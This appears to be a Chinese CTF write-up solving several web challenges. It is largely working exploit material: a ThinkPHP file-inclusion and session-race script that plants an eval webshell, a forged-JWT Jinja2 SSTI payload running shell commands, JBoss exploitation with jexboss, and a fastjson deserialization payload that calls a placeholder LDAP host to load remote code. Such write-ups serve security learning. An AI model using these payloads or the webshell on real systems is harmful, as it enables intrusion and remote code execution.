DaLaBengBa
掃描目錄得備份文件
查看控制器index
IndexController.class.php
<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
public function index($doge=''){
if(preg_grep('/flag|Home|Common\/21/i',$doge)){
die("<dialog open>Get Out Hacker!</dialog>");
}else{
$this->assign($doge);
$this->display();
}
}
}
根據參考文章的分析可知
傳入的數組變量$doge
最后賦值給Storage::load
方法中的數組$vars
變量
extract()
函數會對其造成變量覆蓋
public function load($_filename,$vars=null){
if(!is_null($vars)){
extract($vars, EXTR_OVERWRITE);
}
include $_filename; //進行包含文件的操作
}
當我們傳入的$doge
為array(['_filename'=>'/etc/passwd'])
時
構造url可形成任意文件包含漏洞
http://498eeee3.yunyansec.com/index.php?g=index&m=home&a=index&doge[_filename]=/etc/passwd
最后利用條件競爭包含session臨時文件getshell
#coding=utf-8
import io
import requests
import threading
sessid = 'TGAO'
data = {"cmd":'''file_put_contents('/var/www/html/1.php', 'shivers<?php eval($_POST["cmd"]);?>');'''}
def write(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = session.post( 'http://498eeee3.yunyansec.com/index.php', data={'PHP_SESSION_UPLOAD_PROGRESS': 'aaa<?php eval($_POST["cmd"]);?>'}, files={'file': ('tgao.txt',f)}, cookies={'PHPSESSID': sessid} )
def read(session):
while True:
resp = session.post('http://498eeee3.yunyansec.com/index.php/?g=index&m=home&a=index&doge[_filename]=/tmp/sess_'+sessid,data=data)
if'tgao.txt'in resp.text:
print(resp.text)
event.clear()
else:
print("[+++++++++++++]retry")
if __name__=="__main__":
event=threading.Event()
with requests.session() as session:
for i in range(1,30):
threading.Thread(target=write,args=(session,)).start()
for i in range(1,30):
threading.Thread(target=read,args=(session,)).start()
event.set()
連接1.php
密碼cmd
POST提交cmd=print_r(file_get_contents('flag.php'));
flag在頁面源代碼中
參考https://www.cnblogs.com/zpchcbd/p/11949672.html
ezpy
利用c-jwt-cracker
工具爆破jwt得密鑰CTf4r
去https://jwt.io/
網站進行jwt偽造
可以發現在user
處存在ssti模板注入
{
"user": "admin{{7*7}}",
"uid": "8606d40d-eac5-4b32-abcf-c6affeee56c1",
"role": "admin",
"passwd": "admin"
}
可以在網頁的title中得到回顯
把所有類下載到本地
{{[].__class__.__base__.__subclasses__()}}
寫腳本找到catch_warnings
類的序號為[243]
f = open('test.txt', 'r')
data = f.read()
r = data.split("<TemplateReference None>")
for i in range(len(r)):
if 'catch_warnings' in r[i]:
print(i, '~~~', r[i])
f.close()
經過繞過后進行構造
{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__.__builtins__[request.args.cat1](request.args.cat2)}}
最后利用
{
"user": "admin{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__.__builtins__[request.args.cat1](request.args.cat2)}}",
"uid": "8606d40d-eac5-4b32-abcf-c6affeee56c1",
"role": "admin",
"passwd": "admin"
}
#####
GET /flag?cat1=eval&cat2=__import__('os').popen('cat$IFS$9/flag').read() HTTP/1.1
Host: edf0588e.yunyansec.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://edf0588e.yunyansec.com/
Connection: close
Referer: http://edf0588e.yunyansec.com/
Cookie: Hm_lvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484716,1632484831; Hm_lpvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484831; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW57e1tdLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzI0M10uX19pbml0X18uX19nbG9iYWxzX18uX19idWlsdGluc19fW3JlcXVlc3QuYXJncy5jYXQxXShyZXF1ZXN0LmFyZ3MuY2F0Mil9fSIsInVpZCI6Ijg2MDZkNDBkLWVhYzUtNGIzMi1hYmNmLWM2YWZmZWVlNTZjMSIsInJvbGUiOiJhZG1pbiIsInBhc3N3ZCI6ImFkbWluIn0.eHyTMcgRaEFgD7U64BCWlrd0UoG8hmwDvA2MMvH2BcM
Upgrade-Insecure-Requests: 1
Old But A Little New
jboss漏洞
利用jexboss
工具
# 搭建
git clone https://github.com/joaomatosf/jexboss.git
pip install requires.txt
# 使用
python jexboss.py -u http://a15a0a60.yunyansec.com/
asuka
同上
soeasy
fastjson<=1.2.47-反序列化漏洞
# 工具:marshalsec,需要用mvn打包一下,建議直接使用打包好的。
# github:https://github.com/mbechler/marshalsec
# 鏈接(已打包好): https://pan.baidu.com/s/1kT9vwhNDDdiJ3dL9BS3U4w&shfl=shareset 提取碼: sven
#####
POST / HTTP/1.1
Host: 8b70f48d.yunyansec.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484716,1632484831; Hm_lpvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484831
Upgrade-Insecure-Requests: 1
Content-Length: 253
{'name':{
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"x": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://xxx.xxx.xxx.xxx:35402/Exploit",
"autoCommit": true
}}
可參考https://cloud.tencent.com/developer/article/1553664